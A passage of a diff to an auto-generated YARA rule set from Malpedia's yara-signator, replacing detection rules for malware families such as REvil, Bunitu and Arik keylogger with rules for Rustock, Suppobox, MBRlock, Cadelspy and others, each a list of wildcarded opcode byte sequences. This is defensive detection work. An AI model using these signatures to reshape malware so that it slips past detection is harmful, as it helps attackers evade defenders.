"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hyperssl_auto.yar#L1-L217" license_url = "N/A" - logic_hash = "071975b61ff1770e71eaa8840068c294ba8aa67d37ecde4d3c9fbb80c75c80c8" + logic_hash = "f5cbe0c98412e251badcd68fd5914804f5830187a82b3a89143d596e8e3b1b20" score = 75 quality = 73 tags = "FILE" @@ -137853,49 +140559,48 @@ rule MALPEDIA_Win_Artra_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b442410 5f 5e 83c41c c21000 5f 33c0 } - $sequence_1 = { 5f 8a08 40 84c9 75f9 2bc2 880c30 } - $sequence_2 = { 75f9 2bc7 3bc8 72e3 8bc6 } - $sequence_3 = { 57 33c9 8d7801 8da42400000000 8a10 } - $sequence_4 = { 800431f3 8bc6 41 8d7801 } - $sequence_5 = { 72e3 8bc6 8d5001 5f 8a08 } - $sequence_6 = { 2bc2 03fb 8a4f01 47 } - $sequence_7 = { 85ff 0f8488000000 6a00 57 ff15???????? } - $sequence_8 = { 8b2d???????? 90 8b542410 8d4c2410 51 } - $sequence_9 = { 40 42 84c9 75f6 e8???????? } - $sequence_10 = { e8???????? 8b3d???????? 6a00 6a00 6a00 8d442414 50 } - $sequence_11 = { 57 ff15???????? 6a6d 56 ff15???????? 8bf0 } - $sequence_12 = { 6a00 8935???????? ff15???????? 8bf8 85ff 0f8488000000 } - $sequence_13 = { 8d442414 50 ffd7 85c0 7445 } - $sequence_14 = { 8b1d???????? 55 8b2d???????? 90 } - $sequence_15 = { 8a15???????? 8817 8d842484020000 8bc8 8bff 8a10 } - $sequence_16 = { e8???????? 8bce c644241800 e8???????? 8b47fc } - $sequence_17 = { c64424204d c644242161 c644242263 c644242368 c64424256e c644242665 c644242747 } - $sequence_18 = { 2bcd 8bfe 8d642400 8a1401 fec2 } - $sequence_19 = { 33c0 0fbe0c30 8d519f 83fa05 } - $sequence_20 = { be0c000000 8a1401 feca 8810 } - $sequence_21 = { ffd6 85c0 75cc 5d 5b 8b442410 } - $sequence_22 = { 83c40c 8b4508 8b7dfc 8be5 5d c3 33c0 } - $sequence_23 = { e8???????? 6a00 8d44242c 50 6a00 683f000f00 6a00 } - $sequence_24 = { 51 ffd6 85c0 7444 } + $sequence_0 = { 0108 3310 c1c607 c1c210 } + $sequence_1 = { 33c3 8b5c244c c1ee12 0bfe 33cf 8bf2 } + $sequence_2 = { 0105???????? 8d8d5cffffff 89855cffffff 898560ffffff } + $sequence_3 = { 2bf0 5f 8a10 301401 8a10 301406 40 } + $sequence_4 = { 40 4f 75f2 5f 5e e9???????? c3 } + $sequence_5 = { 7436 8b413c 03c1 742a } + $sequence_6 = { 03c1 742a 8b4028 03c1 } + $sequence_7 = { 0101 0100 0100 0100 } + $sequence_8 = { 0100 0200 0200 0002 0002 } + $sequence_9 = { 33c0 40 5d c20c00 6a08 } + $sequence_10 = { 0108 3908 1bc9 f7d9 } + $sequence_11 = { 8b4028 03c1 7423 56 57 } + $sequence_12 = { ff15???????? 8bc8 85c9 7436 8b413c } + $sequence_13 = { 0105???????? 8d558c 89458c 894590 } + $sequence_14 = { c20c00 6a08 68???????? e8???????? 8b450c 83f801 } + $sequence_15 = { 0101 014514 2bf3 8b5d0c } + $sequence_16 = { 01442428 8b442428 884500 45 } + $sequence_17 = { 017e0c 5f 8bc6 5e c20800 } + $sequence_18 = { 017e0c 395e10 740f ff7610 } + $sequence_19 = { 017e08 8bc3 e8???????? c20400 } + $sequence_20 = { 017e0c 8d4d08 e8???????? 5f } + $sequence_21 = { 011d???????? 5f 8935???????? 5e } + $sequence_22 = { 017e08 50 e8???????? ff0d???????? } + $sequence_23 = { 016b08 897b04 5f 5e } condition: - 7 of them and filesize <811008 + 7 of them and filesize <835584 } -rule MALPEDIA_Win_Unidentified_105_Auto : FILE +rule MALPEDIA_Win_Suppobox_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "80a8f5ec-0d23-5074-b907-8dcd99006ffb" + id = "4c561dbc-9b95-52c8-b1b6-738a8e400b62" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_105_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.suppobox_auto.yar#L1-L194" license_url = "N/A" - logic_hash = "03b63f792ccab1aa0e70284622fef7dcf74ab6cde5a0b9206fdbab8d689a2bd1" + logic_hash = "33ed4ed4c3c8a05bca33fadb06a60aef627f5ee4031100bb5102db6965fc9d6b" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -137907,32 +140612,44 @@ rule MALPEDIA_Win_Unidentified_105_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 0f95c0 84c0 742c } - $sequence_1 = { 8bf8 8d4f02 b856555555 f7e9 8bc2 c1e81f 03c2 } - $sequence_2 = { 6a00 8d8dd0feffff 51 8d95fcfeffff } - $sequence_3 = { 8d8d94feffff 51 6800000010 50 52 ff15???????? 85c0 } - $sequence_4 = { e8???????? 83c404 50 e8???????? a1???????? 6800020000 } - $sequence_5 = { 83f8ff 7459 8d9424a0010000 52 } - $sequence_6 = { 68???????? 56 e8???????? 8bc6 83c454 } - $sequence_7 = { 8bf8 8d4f02 b856555555 f7e9 8bc2 } - $sequence_8 = { 8b3d???????? 8d45e4 50 33f6 } - $sequence_9 = { 6800100000 8d85f8efffff 50 51 } + $sequence_0 = { 7d10 a1???????? 0b05???????? a3???????? } + $sequence_1 = { 7f10 a1???????? 2305???????? a3???????? } + $sequence_2 = { 8945f0 a1???????? 83e801 a3???????? } + $sequence_3 = { 7e10 a1???????? 0305???????? a3???????? } + $sequence_4 = { 890d???????? e8???????? 8bf0 e8???????? 03f0 } + $sequence_5 = { 7d10 a1???????? 3305???????? a3???????? } + $sequence_6 = { 3bc8 7d10 a1???????? 2b05???????? a3???????? } + $sequence_7 = { 01bdacf7ffff 83c40c 83bdc8f7ffff00 8b95c8f7ffff } + $sequence_8 = { 8d45f3 83ec04 890424 e8???????? } + $sequence_9 = { 8d45f3 890424 e8???????? 52 ebc5 } + $sequence_10 = { 8d45f4 89442408 e9???????? 8b4508 } + $sequence_11 = { 01c6 39fe 0f8d7e010000 80bc2ef4f7ffff0a } + $sequence_12 = { 8d45f2 89f1 89442404 c70424???????? } + $sequence_13 = { 01d8 3b85b0f7ffff 7e2f 8b95c8f7ffff } + $sequence_14 = { 8d45f2 89442404 8b4508 890424 e8???????? 83ec08 } + $sequence_15 = { 8d45ef 89d9 890424 e8???????? 51 } + $sequence_16 = { 01d7 68???????? 57 e8???????? } + $sequence_17 = { 01c6 ebdb ff7510 57 } + $sequence_18 = { 01c9 4a 79f2 833b54 } + $sequence_19 = { 8d45f4 89442408 c744240401000000 893424 } + $sequence_20 = { 01c6 39fe 0f8d2f020000 80bc2ef4f7ffff0a } + $sequence_21 = { 019dacf7ffff 83c40c 299dc4f7ffff e9???????? } condition: - 7 of them and filesize <253952 + 7 of them and filesize <1875968 } -rule MALPEDIA_Win_Bunitu_Auto : FILE +rule MALPEDIA_Win_Rustock_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fdd29b03-d926-5cbf-98be-29b287d71b21" + id = "cb44bdc8-a730-56ac-98ad-0553c4475f0d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bunitu_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rustock_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "c3bd7c13018c7a8c4646040c13e12026479d672a4bbef2d99f41e09a2ac2f388" + logic_hash = "5fff7e7d2c26e2013c1d3a65535e3ac75dc9cd45cc7a0c04309e438d2a86951e" score = 75 quality = 75 tags = "FILE" @@ -137946,32 +140663,32 @@ rule MALPEDIA_Win_Bunitu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 50 6a00 68???????? 6a00 50 ff15???????? } - $sequence_1 = { 58 6a02 ffb524fdffff ff15???????? ffb524fdffff } - $sequence_2 = { 50 ff75ec e8???????? 0bc0 7e18 50 } - $sequence_3 = { 48 40 8d443825 668b00 } - $sequence_4 = { c70003000000 ffb524fdffff 8f4004 ffb528fdffff 8f4008 } - $sequence_5 = { ffb524fdffff e8???????? eb12 6a08 68???????? ffb524fdffff e8???????? } - $sequence_6 = { 59 8bd0 8bdf b82f000000 } - $sequence_7 = { 895004 b9???????? 8d55fc 52 6800000100 50 51 } - $sequence_8 = { c70003000000 ff75f0 8f4004 ff75ec 8f4008 } - $sequence_9 = { 837df000 7614 6a02 ff75f0 ff15???????? } + $sequence_0 = { 8d6424fc 892c24 31ed 01e5 8d6424e4 50 } + $sequence_1 = { 031d???????? 21db 5e 5a } + $sequence_2 = { 8bd8 85db 7439 8b4dc0 33c0 8bfb 8bd1 } + $sequence_3 = { 83c604 56 53 ff15???????? 53 } + $sequence_4 = { 833d????????00 7421 56 e8???????? 85c0 59 75ac } + $sequence_5 = { 50 ff7520 e8???????? 83c418 8945cc 3bc7 74d4 } + $sequence_6 = { ff750c e8???????? 68e8030000 ff15???????? e8???????? 8bf8 } + $sequence_7 = { 59 8945c4 83f8ff 7507 33c0 e9???????? 3b4520 } + $sequence_8 = { ebb5 7402 ebd3 8b1c24 68???????? } + $sequence_9 = { 014514 a1???????? 83f802 0f84de010000 3bc7 } condition: - 7 of them and filesize <221184 + 7 of them and filesize <565248 } -rule MALPEDIA_Win_Virdetdoor_Auto : FILE +rule MALPEDIA_Win_Acehash_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "888dbb4a-ac95-59fd-b6c6-805a13eab949" + id = "14f9c3a4-6e4e-554e-b1b7-7826b028e7e0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virdetdoor_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acehash_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "f95b30ef178ddd53d43c681785d15b079df5f7a769adfe7338b74de03b97c177" + logic_hash = "a82974d1f4758bd3335b7cc99825d249f1ec423d226c32410d6047b493cb8d39" score = 75 quality = 75 tags = "FILE" @@ -137985,32 +140702,32 @@ rule MALPEDIA_Win_Virdetdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b93b0020000 2bc2 50 8b83ac020000 03c2 50 } - $sequence_1 = { 83ee01 753e 85ff 7524 390b 7720 3903 } - $sequence_2 = { 8d4dc0 e8???????? 85c0 0f84c8000000 } - $sequence_3 = { 83fe08 0f43c8 83c602 0fb7444dc0 0bd0 0fb7449dd2 0bd0 } - $sequence_4 = { 59 8d44240c 8bce 50 ff7314 57 e8???????? } - $sequence_5 = { 0fbfd0 8d8df8fdffff ff7508 50 } - $sequence_6 = { 55 8bec 51 51 53 8bc1 33db } - $sequence_7 = { ff75f0 8d8b50020000 e8???????? 834dfcff } - $sequence_8 = { 3c2e 7404 3c3a 750e 8a0437 88441dc0 43 } - $sequence_9 = { 8945f8 8b4508 8bf0 8975f0 8d5808 895df4 } + $sequence_0 = { 4885c0 7420 488d1599dc0200 488bcb ff15???????? 488bc8 } + $sequence_1 = { 85c0 0f85e6000000 4c8b470c 488b55d0 488b4f04 ff15???????? 8bd8 } + $sequence_2 = { 488b7d98 8b742440 8b542458 41bb00020000 4c8d0d4e23feff 448a3f 4584ff } + $sequence_3 = { 7510 b810000000 488b5c2430 4883c420 5f c3 4885db } + $sequence_4 = { 85ff 0f8513ffffff 33c0 4c8b642450 4c8b6c2458 488b5c2460 4883c430 } + $sequence_5 = { 442b8486a0e10300 4533d8 83bf800000000a 0f863c010000 8b4730 8b4f70 458d0c03 } + $sequence_6 = { 8bc3 483bd0 0f871a050000 4c8d151995fdff 4403f2 4b8b8ceaa0511100 8a443108 } + $sequence_7 = { 8bfd 66895802 410fb78704100000 0fbfcb } + $sequence_8 = { 7cda 440fbf4302 418bd4 488bce 468d048508000000 e8???????? 488d0d33240300 } + $sequence_9 = { 48833d????????00 488d0581900300 740f 3908 740e 4883c010 4883780800 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <2318336 } -rule MALPEDIA_Win_Broler_Auto : FILE +rule MALPEDIA_Win_Fakerean_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5abffeef-f83b-5c44-9f6f-38ecebdd4974" + id = "a7ea6f88-76f7-54f5-a9b5-14fd4ef8d3d9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.broler_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fakerean_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "a9e85383ead8a369d8ed21ea68b384350908e471fda84214a900f85e6e6d4412" + logic_hash = "7dfee10ceca58c69279376a54d184530389bbd0c9b8b6dd9a398c5796de2f6f3" score = 75 quality = 75 tags = "FILE" @@ -138024,32 +140741,32 @@ rule MALPEDIA_Win_Broler_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 68???????? 50 68???????? 56 ff15???????? 898520dffcff } - $sequence_1 = { 39b820b54100 0f8491000000 ff45e4 83c030 3df0000000 72e7 81ffe8fd0000 } - $sequence_2 = { e8???????? 83c404 33c0 8845f0 8945f1 8945f5 668945f9 } - $sequence_3 = { 8d8db0dffcff 51 ba???????? e8???????? } - $sequence_4 = { e8???????? 83c404 33ff be0f000000 89b588fdffff 89bd84fdffff c68574fdffff00 } - $sequence_5 = { 33ff 3bcf 7564 c743140f000000 897b10 b8???????? } - $sequence_6 = { 898ed4030000 8b5004 8996d8030000 8b4808 } - $sequence_7 = { 899d50fdffff ff15???????? 8b9550fdffff 52 8d45a8 68???????? 50 } - $sequence_8 = { e8???????? e9???????? 50 8d459c 50 } - $sequence_9 = { 895910 c741140f000000 8d5508 89a51cdffcff 8819 52 } + $sequence_0 = { 752e 8945fc eb29 395dfc 7524 57 8bce } + $sequence_1 = { 49 6a01 ff750c 50 57 ff7514 40 } + $sequence_2 = { ff15???????? 3d14050000 74e5 ff7508 56 57 ff15???????? } + $sequence_3 = { ff7508 ff15???????? 3bc3 0f8495000000 8b400c 8b00 } + $sequence_4 = { 59 3bc3 7419 8d5010 e8???????? 8945e0 3bc3 } + $sequence_5 = { ff35???????? ff15???????? 6800000500 6aec ff35???????? ff15???????? 680000cf06 } + $sequence_6 = { 741a 81fe00020000 7d12 56 8bc7 e8???????? } + $sequence_7 = { 8b4df0 6bc018 6bc918 8b4c190c 2b4c1804 f7df } + $sequence_8 = { f7d8 1bc0 25bfe0ffff 05401f0000 50 ff35???????? ff15???????? } + $sequence_9 = { 8d45f0 50 8d450c 50 ff15???????? 85c0 7431 } condition: - 7 of them and filesize <275456 + 7 of them and filesize <4071424 } -rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE +rule MALPEDIA_Win_Smarteyes_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "85657a12-5353-59c6-96c2-3cad36ac8818" + id = "60f92ddb-7402-5d47-97fc-69a2fdffb7f3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.arik_keylogger_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smarteyes_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "f00c46b1c19068a9b1d9eb23a1cbe0ffd294a87bebb3732b435039b4cebfac37" + logic_hash = "8c2da2c0cae87308c8e6e0dfb55ae530bef3c36e3693a233b1d96edfb1425c3c" score = 75 quality = 75 tags = "FILE" @@ -138063,32 +140780,32 @@ rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b45fc f7402801000000 755a 8b45fc 8b55fc 8b12 ff927c040000 } - $sequence_1 = { dd5df8 e8???????? ba???????? 8d45c0 e8???????? 58 85c0 } - $sequence_2 = { 8b804c010000 e8???????? e8???????? 84c0 7424 8b45f8 8b804c010000 } - $sequence_3 = { b003 e9???????? b004 e9???????? b005 e9???????? b006 } - $sequence_4 = { e8???????? 8b45ec 8908 8b45f0 8b08 034df4 7105 } - $sequence_5 = { e8???????? 50 85c0 0f8528010000 8b45b8 e8???????? c745b400000000 } - $sequence_6 = { eb16 8b45fc 8b4004 0d00001000 0d00002000 8b55fc 894204 } - $sequence_7 = { f3a5 8b45f4 83b8d002000000 7432 8b45f8 50 8b4518 } - $sequence_8 = { 8b45f4 e8???????? 8b45f4 83c024 8a4d08 8d55ec e8???????? } - $sequence_9 = { 8d45d4 e8???????? c745d400000000 8d45d0 e8???????? c745d000000000 8b4614 } + $sequence_0 = { 51 8d85d4fdffff 50 e8???????? 8d85d4fdffff 889c35d4fdffff 83c40c } + $sequence_1 = { 68???????? e9???????? 53 68???????? e8???????? 33c0 40 } + $sequence_2 = { 3bc3 0f8426030000 8d842488040000 50 6804010000 ff15???????? 85c0 } + $sequence_3 = { 7478 83c00c 8bc8 8d7901 8a11 41 84d2 } + $sequence_4 = { 7413 8d85ecfeffff 57 50 } + $sequence_5 = { ff742424 ff742420 ff15???????? 85c0 7547 } + $sequence_6 = { e8???????? 59 59 8d8548f5ffff 50 8d9d78f7ffff e8???????? } + $sequence_7 = { 7514 8bf9 c744241001000000 e8???????? e9???????? 68???????? 8d442424 } + $sequence_8 = { 8d45ff 50 e8???????? 8a4736 8845ff 53 8d45ff } + $sequence_9 = { 8bd6 0fb7c0 6683f82f 7406 6683f85c 7502 8bca } condition: - 7 of them and filesize <4947968 + 7 of them and filesize <429056 } -rule MALPEDIA_Win_Threebyte_Auto : FILE +rule MALPEDIA_Win_Linseningsvr_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ce3faee0-35b6-5807-9d64-6a9a343be0ab" + id = "acba9094-ad6f-5dc3-983b-34f0b25c68ba" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.threebyte_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.linseningsvr_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "ea76c04ceecd329a1dbc8646fe87d0982e2f7a41db170c209ba00ee2ed2e0d90" + logic_hash = "2644e1e1ca2803e3e5ff6eb23f753be414d9d9a67fa2dca1bfd8c0b76cd44619" score = 75 quality = 75 tags = "FILE" @@ -138102,32 +140819,32 @@ rule MALPEDIA_Win_Threebyte_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 0f8511010000 c68514ffffff5b c68515ffffff3e c68516ffffff3e c68517ffffff20 } - $sequence_1 = { 8a8415fcfeffff 88840dfcfeffff 8b8df0feffff 8a95f8feffff 88940dfcfeffff } - $sequence_2 = { 6a00 8d4dbc 51 6801000080 ff15???????? 85c0 7407 } - $sequence_3 = { e8???????? 83c404 83c8ff eb44 8b8d24f7ffff 038d14f7ffff 898d24f7ffff } - $sequence_4 = { 8b8d10f7ffff ff510c 8b9564f7ffff 52 8b8510f7ffff ff500c 8b4df4 } - $sequence_5 = { 8d8d68f3ffff e8???????? e9???????? c78568f2ffff00000000 c645fc00 8d4df0 e8???????? } - $sequence_6 = { 33c0 8dbddefcffff f3ab 66ab c78594faffff00010000 8d9594faffff 52 } - $sequence_7 = { 8b4d10 894df8 c745ec00000000 eb09 8b55ec } - $sequence_8 = { e8???????? 8985a8fbffff 668b15???????? 668995ecfbffff b9ff000000 } - $sequence_9 = { e8???????? 83c404 e9???????? c7459801010000 8b9564ffffff 8955a4 8b45ec } + $sequence_0 = { 81c4cc0d0000 c3 68ffffff7f 56 ff15???????? 83f8ff } + $sequence_1 = { 5d b801000000 5b 81c4cc0d0000 } + $sequence_2 = { 8b4c2428 6a24 8d542464 6a01 52 89442464 } + $sequence_3 = { 7e16 8b742414 8bd1 8d7c1f18 c1e902 f3a5 8bca } + $sequence_4 = { f6c202 7410 8088????????20 8a9405ecfcffff ebe3 80a0808b400000 40 } + $sequence_5 = { 0f858b030000 33c9 8acc 3ac8 } + $sequence_6 = { 55 6800010000 8d942464040000 6a01 52 e8???????? } + $sequence_7 = { 8acc 3ac8 0f857f030000 33d2 55 89542432 } + $sequence_8 = { 66895c2411 89442419 885c2418 8944241d 89442421 6689442425 88442427 } + $sequence_9 = { 7514 ff15???????? 50 68???????? e8???????? 83c408 55 } condition: - 7 of them and filesize <180224 + 7 of them and filesize <81360 } -rule MALPEDIA_Win_Pykspa_Auto : FILE +rule MALPEDIA_Win_Mbrlock_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c344e44d-277b-5916-93ac-fe5b84ee097a" + id = "daa9848d-eee7-57fa-b29b-86c1367b5691" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pykspa_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mbrlock_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "ae1a9dadb1337e6c1ef760caa0d42ce5c68005bd2830f1ee498d2437086c9f33" + logic_hash = "7a0dcc0e30832e7304006fa42a5eab963221d66f36bad91605b77fec2d75b555" score = 75 quality = 75 tags = "FILE" @@ -138141,32 +140858,32 @@ rule MALPEDIA_Win_Pykspa_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b5c240c 57 8b7c240c 3bfb 7513 57 8b7c2418 } - $sequence_1 = { 6a00 c6400e01 ff15???????? cc 55 8bec b89c110000 } - $sequence_2 = { c3 a1???????? 85c0 7501 c3 8b4818 85c9 } - $sequence_3 = { 381d???????? 8b2d???????? 744f 8d442418 68???????? 50 e8???????? } - $sequence_4 = { c60000 807d0000 0f843b010000 57 ff742414 e8???????? 50 } - $sequence_5 = { 0f95c0 5e c3 55 8bec 83ec54 53 } - $sequence_6 = { ff15???????? 8b35???????? 53 ffd6 8b3d???????? 53 ffd7 } - $sequence_7 = { 381d???????? 7508 381d???????? 743e 56 ff15???????? 83f805 } - $sequence_8 = { 8d85acfeffff 68???????? 50 e8???????? 85c0 59 59 } - $sequence_9 = { 6a05 8bca 33d2 f7f3 8bc7 bb40e20100 03ca } + $sequence_0 = { 898e94000000 8945e4 e9???????? 8b5d10 8b7d14 8b4e0c } + $sequence_1 = { 8bcb bd01000000 e8???????? 8bf0 85f6 0f84f8000000 85ed } + $sequence_2 = { 8b4de8 8bc1 25ffff0000 2d4c450000 7475 83e802 7433 } + $sequence_3 = { e8???????? 8b45ec 3d00800000 74ab 8b450c 8d5594 } + $sequence_4 = { 894e30 50 53 8bcf e8???????? 85c0 7505 } + $sequence_5 = { e8???????? 8bd0 85d2 7424 817f1402000080 7519 8b470c } + $sequence_6 = { 8bcf e8???????? 8b4d08 894144 8b45ec 85c0 7505 } + $sequence_7 = { 33d2 8bd9 668b144590844a00 8b4c2430 8954242c 8bc1 be02000000 } + $sequence_8 = { 68ac5e0110 56 50 53 8bcf e8???????? } + $sequence_9 = { a3???????? 39a81c010000 7405 8b4010 eb02 33c0 ffd0 } condition: - 7 of them and filesize <835584 + 7 of them and filesize <2031616 } -rule MALPEDIA_Win_Revil_Auto : FILE +rule MALPEDIA_Win_Cadelspy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "81d28baf-82e1-54c0-bbf9-d56336789206" + id = "4b5e300d-757a-5fee-8d04-bdd6cbf72a64" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.revil_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cadelspy_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "2c34d02da785d928c9b5b4ca67c597715944f5d05b15c54928c0e64e7282a006" + logic_hash = "7f3bdf0fe810a37a01bcc3fbdfdc1fe97ab8b02a604549fa04a7da715441b0c6" score = 75 quality = 75 tags = "FILE" @@ -138180,32 +140897,32 @@ rule MALPEDIA_Win_Revil_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 334f1c 83c720 d1f8 83e801 89450c e9???????? 8b7510 } - $sequence_1 = { 50 e8???????? 8b7d08 8db568ffffff 83c414 } - $sequence_2 = { 83e801 eb07 b00a 5d c3 83e862 7428 } - $sequence_3 = { 8d8510ffffff 50 8d8560ffffff 50 8d45b0 50 e8???????? } - $sequence_4 = { ff750c 8d45b0 50 8d85c0feffff 50 } - $sequence_5 = { 8b4508 8b404c 8945f0 8b45e8 894b28 f7d0 23c2 } - $sequence_6 = { 334de0 8b4048 8b5d08 8945ec 8b4508 } - $sequence_7 = { ff7520 e8???????? 8d8580feffff 50 ff7524 } - $sequence_8 = { 8975d8 0fb645ff 0bc8 8bc1 894dd8 } - $sequence_9 = { 83e813 0f8461060000 83e83d 0f84fa020000 f6c204 7411 80f92c } + $sequence_0 = { e8???????? c7042408020000 33f6 56 ff7514 e8???????? 83c40c } + $sequence_1 = { e8???????? 68???????? 8d9c2464020000 e8???????? 6828020000 } + $sequence_2 = { 46 66833e5c 74f8 8bc6 8d5002 } + $sequence_3 = { 59 59 85c0 7524 837d8c05 } + $sequence_4 = { ff15???????? ff75fc 8bd8 ff15???????? 5e 8bc3 5b } + $sequence_5 = { 57 33ff 893a 8d4802 668b30 40 } + $sequence_6 = { 8b0c8d004c0110 83e01f c1e006 8d440124 } + $sequence_7 = { 741b 8b07 8bc8 c1f905 83e01f c1e006 8b0c8d004c0110 } + $sequence_8 = { 8d442418 50 e8???????? eb0b 50 } + $sequence_9 = { 7507 e8???????? eb5f 57 8b7d08 85ff 750a } condition: - 7 of them and filesize <155794432 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Unidentified_041_Auto : FILE +rule MALPEDIA_Win_Unidentified_095_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "54c40e17-80e5-57a5-babe-281dfc0f14df" + id = "37abc0ea-ddce-59f3-9ad7-8e440d8ff0bb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_041_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_095_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "72336cc9bc2b4e7b40dbb912cf40721cd5c8d54310aa5ce8f7ef42d8a402b398" + logic_hash = "2ccf7caa3b3d5540a5f23128f7d00405bc7a6134a0c6b4f4e250221b4826e780" score = 75 quality = 75 tags = "FILE" @@ -138219,32 +140936,32 @@ rule MALPEDIA_Win_Unidentified_041_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff761c ff7618 ff7304 e8???????? 8d45bf c645bf0d 50 } - $sequence_1 = { 885d9b e9???????? 391f 75c7 385e04 752e } - $sequence_2 = { 